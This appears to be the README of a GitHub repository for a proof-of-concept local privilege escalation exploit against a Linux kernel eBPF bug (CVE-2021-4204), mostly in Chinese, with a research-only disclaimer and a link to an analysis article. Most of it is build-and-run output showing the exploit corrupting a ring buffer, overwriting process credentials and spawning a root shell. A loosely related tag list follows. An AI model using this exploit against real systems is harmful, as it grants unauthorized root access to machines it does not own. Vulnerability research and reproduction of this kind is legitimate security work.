tr3ee/CVE-2021-4204

# CVE-2021-4204 中文分析文章：https://tr3e.ee/posts/cve-2021-4204-linux-kernel-ebpf-lpe.txt 仅供教育/研究目的使用。请自行承担风险。 ## 构建与运行 ``` $ sh build_and_run.sh Build from source... cc -I include -static -w -o exploit exploit.c Start exploit! This might take some while... [*] phase(1/7) 'create bpf map(s)' running [+] phase(1/7) 'create bpf map(s)' done [*] phase(2/7) 'corrupt ringbuf' running Killed -------------------------------- [*] phase(1/7) 'create bpf map(s)' running [+] phase(1/7) 'create bpf map(s)' done [*] phase(2/7) 'corrupt ringbuf' running [+] phase(2/7) 'corrupt ringbuf' done [*] phase(3/7) 'spawn processes' running [+] phase(3/7) 'spawn processes' done [*] phase(4/7) 'find cred (slow)' running [+] phase(4/7) 'find cred (slow)' done [*] phase(5/7) 'overwrite cred' running [+] phase(5/7) 'overwrite cred' done [*] phase(6/7) 'spawn root shell' running [+] Enjoy root! # id uid=0(root) gid=0(root) groups=0(root) # 退出 [+] phase(6/7) 'spawn root shell' done [*] phase(7/7) 'clean up the mess' running [+] phase(7/7) 'clean up the mess' done ```

标签：0day挖掘, Cutter, CVE-2021-4204, Docker镜像, Linux内核, LPE, PoC, Ringbuf, Root, Web报告查看器, 内核安全, 协议分析, 子域名枚举, 安全渗透, 客户端加密, 客户端加密, 暴力破解, 本地提权, 权限提升, 漏洞复现, 系统安全, 网络安全, 隐私保护, 黑客技术